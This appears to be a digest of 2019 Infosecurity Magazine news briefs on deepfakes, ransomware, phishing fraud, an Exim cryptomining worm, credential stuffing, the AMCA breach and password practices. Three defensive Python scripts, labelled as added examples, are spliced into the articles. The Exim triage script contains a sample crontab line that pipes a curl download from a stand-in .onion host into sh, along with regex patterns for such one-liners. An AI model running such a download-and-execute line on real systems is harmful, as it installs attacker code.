
US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a digitally transformed Arnold Schwarzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, on the threat posed by "deepfakes," according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis….Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent Clint Watts, senior fellow for the Alliance for Securing Democracy at the German Marshall Fund, was part of a four-person panel that testified before lawmakers about the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers who are worried about the potential threat of deepfakes. In a June 13 blog post, Nieman Lab looked at the myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Source: Information Security Magazine

Malware a Serious Threat for Industrial Orgs

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Source: Information Security Magazine

Canadian City Fell Prey to a $375K Phish

Yet another city has fallen victim to "a complex phishing email." The scam cost Burlington, Ontario, Canada, C$503,000, the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor…and was processed on May 16," the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.  

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in hope to mitigate the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Source: Information Security Magazine

Home Secretary Signs Assange US Extradition Request

The UK home secretary Sajid Javid has signed a US request for the extradition of WikiLeaks founder Julian Assange.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access of Pentagon computers to access classified information.

However, that was superseded by an 18-count indictment detailing charges related to Assange’s publishing of that classified information, which it is alleged harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.  

Source: Information Security Magazine

Millions of Email Servers at Risk from Cryptomining Worm

Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are exposed to CVE-2019-10149, a remote code execution vulnerability disclosed last week and fixed in Exim 4.92, according to security vendor Cybereason.

There appear to have been two waves of attack: in the first, attackers pushed out exploits from a command-and-control (C2) server on the clear web; the second seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs and SSH keys the malware installed.

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the Tor network to host their payloads and created deceiving Windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason.

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”
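As an added example (not Cybereason's code and not part of the original article), the following Python script covers the three checks the advice above implies: whether an Exim build falls inside the CVE-2019-10149 range (4.87 through 4.91, fixed in 4.92), whether a crontab contains the kind of download-and-execute entries the worm installs, and whether an authorized_keys file holds a key that is not on the team's allow-list. The indicator patterns, the allow-list and the sample crontab and key file are constructed assumptions; the key blobs are placeholders, not real keys.

```python
"""Triage helpers for the Exim worm campaign described above.

Added example, not code from Cybereason or from the article. Assumptions
(marked below): the version range for CVE-2019-10149, the cron indicator
patterns, and the sample crontab and authorized_keys content, which is
constructed and contains no real keys or attacker infrastructure.
"""
import re

# Exim 4.87 through 4.91 are affected by CVE-2019-10149; 4.92 contains the fix.
VULN_MIN = (4, 87)
FIXED = (4, 92)

# Indicators the article attributes to the worm: payloads hosted on Tor hidden
# services and download-and-execute one-liners. The exact patterns are an
# assumption and will need tuning for a real fleet.
SUSPICIOUS_CRON = re.compile(
    r"\.onion\b|(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b|/dev/shm/|/tmp/\S+",
    re.IGNORECASE,
)


def parse_exim_version(banner: str) -> tuple:
    """Return (major, minor) from the first line of `exim -bV` output,
    e.g. 'Exim version 4.91 #1 built 12-Jun-2019'."""
    m = re.search(r"Exim version (\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("not an Exim version banner: %r" % banner)
    return int(m.group(1)), int(m.group(2))


def is_vulnerable(banner: str) -> bool:
    """True when the reported version falls inside the affected range."""
    return VULN_MIN <= parse_exim_version(banner) < FIXED


def suspicious_cron_lines(crontab: str) -> list:
    """Return (line_number, line) for crontab entries matching the indicators."""
    hits = []
    for n, line in enumerate(crontab.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if SUSPICIOUS_CRON.search(entry):
            hits.append((n, entry))
    return hits


def unknown_ssh_keys(authorized_keys: str, allowed_blobs: set) -> list:
    """Return (key_type, comment) for every key whose base64 blob is not in
    the allow-list. Handles an optional leading options field such as
    command="..." by locating the key-type token."""
    unknown = []
    for line in authorized_keys.splitlines():
        parts = line.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        key_type, blob = parts[idx], parts[idx + 1]
        comment = " ".join(parts[idx + 2:])
        if blob not in allowed_blobs:
            unknown.append((key_type, comment))
    return unknown


# Constructed samples for a stand-alone run.
CRON_SAMPLE = """\
# constructed sample crontab, not captured attacker data
0 3 * * * /usr/bin/certbot renew
*/5 * * * * curl -s http://constructedexample.onion/ldm | sh
"""

AUTHORIZED_KEYS_SAMPLE = """\
# constructed sample; the blobs are placeholders, not real keys
ssh-ed25519 AAAAC3placeholderAdminKey admin@bastion
command="/usr/bin/backup" ssh-rsa AAAAB3placeholderBackupKey backup@nas
ssh-rsa AAAAB3placeholderUnknownKey root@attacker
"""
ALLOWED_BLOBS = {"AAAAC3placeholderAdminKey", "AAAAB3placeholderBackupKey"}

if __name__ == "__main__":
    print("vulnerable:", is_vulnerable("Exim version 4.91 #1 built 12-Jun-2019"))
    print("cron hits:", suspicious_cron_lines(CRON_SAMPLE))
    print("unknown keys:", unknown_ssh_keys(AUTHORIZED_KEYS_SAMPLE, ALLOWED_BLOBS))
```

Feed it the output of `exim -bV`, root's `crontab -l` (plus the files under /etc/cron.d) and /root/.ssh/authorized_keys. Removing a cron entry or a rogue key is only useful once the Exim upgrade is in place: the worm scans for and re-infects unpatched hosts from every other node it has taken.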

Source: Information Security Magazine

Employees Out of Work after ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left unable to do their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from VRT NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time….As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization."

Source: Information Security Magazine

Gaming's All Fun and Games Till Someone Gets Hacked

Cyber-criminals are playing games with the gaming industry, according to two new reports published by Akamai and Kaspersky.

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks represent only 24.7%, according to the report. As SQLi has grown as an attack vector, the report found the two problems tightly linked: credentials stolen through SQLi are what feed credential-stuffing campaigns.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”
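Credential stuffing has a distinctive shape in login telemetry: one source replaying many different usernames, most of them failing, with the occasional success that is the attacker's actual payoff. The Python detector below, an added example that is not Akamai's code or part of the original report, runs that logic over a constructed login-audit sample. The log format, the thresholds and the sample lines (which use documentation-range addresses) are assumptions; the approach carries over to any login log once the parser is swapped.

```python
"""Credential-stuffing detector run over constructed login-audit lines.

Added example, not Akamai's code or the article's. Assumes a hypothetical
log format (timestamp, src, user, result) and threshold values that would be
tuned per site; the sample lines use documentation (TEST-NET) addresses.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_line(line: str):
    """Return (timestamp, ip, user, succeeded) or None for lines not in the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group("ip"), m.group("user"), m.group("result") == "ok"


def stuffing_sources(lines, window=timedelta(minutes=5),
                     min_users=5, min_fail_ratio=0.8) -> dict:
    """Flag source IPs that, within `window`, try at least `min_users` distinct
    usernames with a failure ratio of `min_fail_ratio` or more. A legitimate
    user retrying one account never trips this; a credential list replayed
    from one IP does. Returns ip -> summary of the widest tripping window."""
    events = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            ts, ip, user, ok = ev
            events[ip].append((ts, user, ok))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        best = None
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits in `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            users = {u for _, u, _ in win}
            failures = sum(1 for _, _, ok in win if not ok)
            if len(users) >= min_users and failures / len(win) >= min_fail_ratio:
                summary = {
                    "distinct_users": len(users),
                    "attempts": len(win),
                    "failures": failures,
                    # accounts that accepted a replayed credential: reset these first
                    "succeeded": sorted(u for _, u, ok in win if ok),
                }
                if best is None or summary["distinct_users"] > best["distinct_users"]:
                    best = summary
        if best:
            flagged[ip] = best
    return flagged


# Constructed sample: one user retrying her own account, then one source
# replaying six different usernames in six seconds with a single hit.
SAMPLE_LOG = """\
2019-06-13T10:00:01Z src=198.51.100.2 user=alice result=fail
2019-06-13T10:00:09Z src=198.51.100.2 user=alice result=fail
2019-06-13T10:00:20Z src=198.51.100.2 user=alice result=ok
2019-06-13T10:01:00Z src=203.0.113.7 user=alice result=fail
2019-06-13T10:01:01Z src=203.0.113.7 user=bob result=fail
2019-06-13T10:01:02Z src=203.0.113.7 user=carol result=fail
2019-06-13T10:01:03Z src=203.0.113.7 user=dave result=fail
2019-06-13T10:01:04Z src=203.0.113.7 user=erin result=fail
2019-06-13T10:01:05Z src=203.0.113.7 user=frank result=ok
malformed line that the parser skips
""".splitlines()

if __name__ == "__main__":
    for ip, summary in stuffing_sources(SAMPLE_LOG).items():
        print(ip, summary)
```

The "succeeded" list is the part an incident responder cares about: those accounts took a password that was already in an attacker's list, so a forced reset for them matters more than blocking the source address, which a stuffing tool will rotate anyway.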

In related news, research from Kaspersky confirmed that more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware in the last 12 months, delivered by cyber-criminals through fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

Source: Information Security Magazine

AGs Warn AMCA Breach Impact Rose to over 20 Million

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorneys general (AGs) in states including New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostics and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

Source: Information Security Magazine

UK Orgs Lose 2.5 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, OneLogin claimed, specifically regarding password rotation and checking passwords against lists of commonly used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists and 78% do not check employee passwords against password complexity algorithms.
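The checks the survey asks about are small to implement. The Python below is an added example, not OneLogin's code or part of the report: it rejects a candidate password that is too short, appears in a common-password blocklist, contains the username, or shows up in a breached-password corpus, using the prefix-bucket (k-anonymity) lookup shape so that only the first five hex characters of the SHA-1 would ever leave the host. The blocklist and the breach corpus are tiny constructed stand-ins. Two caveats the page's wording glosses over: rainbow tables are a storage-side concern, addressed by per-user salts and a slow hash such as bcrypt or Argon2, not something a password is "checked against" at enrolment; and current guidance (NIST SP 800-63B) favours length and blocklists over composition rules and scheduled rotation, which is why the example applies neither.

```python
"""Password-acceptance checks of the kind the OneLogin findings refer to.

Added example, not OneLogin's code or the article's. Assumptions: the common
password list and the breached-password corpus are tiny constructed stand-ins;
a real deployment would use a full blocklist and a breach-lookup service.
"""
import hashlib
from collections import defaultdict

# Constructed excerpt of a common-password blocklist.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome1"}

# Constructed stand-in for a breached-password corpus, indexed the way a
# k-anonymity range lookup works: only the first five hex characters of the
# SHA-1 would leave the host; the remaining 35 are compared locally.
_BREACHED_SAMPLE = {"Summer2019!", "Password1"}
BREACH_INDEX = defaultdict(set)


def _sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


for _pw in _BREACHED_SAMPLE:
    _h = _sha1_hex(_pw)
    BREACH_INDEX[_h[:5]].add(_h[5:])


def is_breached(password: str) -> bool:
    """Range-style lookup: prefix selects the bucket, suffix is matched locally."""
    h = _sha1_hex(password)
    return h[5:] in BREACH_INDEX.get(h[:5], set())


def check_password(password: str, username: str = "") -> list:
    """Return the list of reasons to reject `password` (empty list = accept).
    Length bounds, blocklist and breach checks follow current guidance
    (NIST SP 800-63B); composition rules and forced rotation are deliberately
    not applied."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if len(password) > 64:
        problems.append("longer than 64 characters")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("in common-password list")
    if username and username.lower() in password.lower():
        problems.append("contains username")
    if is_breached(password):
        problems.append("appears in breach corpus")
    return problems


if __name__ == "__main__":
    for candidate in ("password", "Summer2019!", "correct horse battery staple"):
        print(repr(candidate), check_password(candidate) or "accepted")
```

The same function belongs at password-change time as well as at enrolment; once it is in place, the rotation policy the survey mentions can be dropped in favour of resetting only the accounts whose passwords turn up in a breach.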

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

Source: Information Security Magazine

“Major Flaw” Discovered in Evernote’s Chrome Extension

A major flaw has been discovered in the code of the Web Clipper Chrome extension of note-taking service Evernote.

The flaw, a universal cross-site scripting (UXSS) bug tracked as CVE-2019-12592, could have allowed threat actors to extract personal information from the browser environment. It was unearthed by security company Guardio and disclosed to Evernote in late May. Within a week, Evernote addressed the issue and rolled out a complete fix.

According to Guardio, a logic error in the Web Clipper extension could have allowed an attacker to bypass the browser’s same-origin policy, granting the attacker code execution in iframes beyond Evernote’s domain. With the browser’s domain-isolation mechanism broken, an attacker could run code that performed actions on behalf of the user and gained access to sensitive user information on affected third-party web pages and services, including authentication, financials, private conversations in social media, personal emails, and more.

Michael Vainshtein, CTO at Guardio, said: “The vulnerability we discovered is a testament to the importance of scrutinizing browser extensions with extra care. People need to be aware that even the most trusted extensions can contain a pathway for attackers. All it takes is a single unsafe extension to compromise anything you do or store online. The ripple effect is immediate and intense.”

The story highlights the importance of swift vulnerability disclosure, response and remediation, particularly given the fact that the flaw had the potential to affect any number of Evernote’s users (around 4,600,000 at the time of discovery).

Source: Information Security Magazine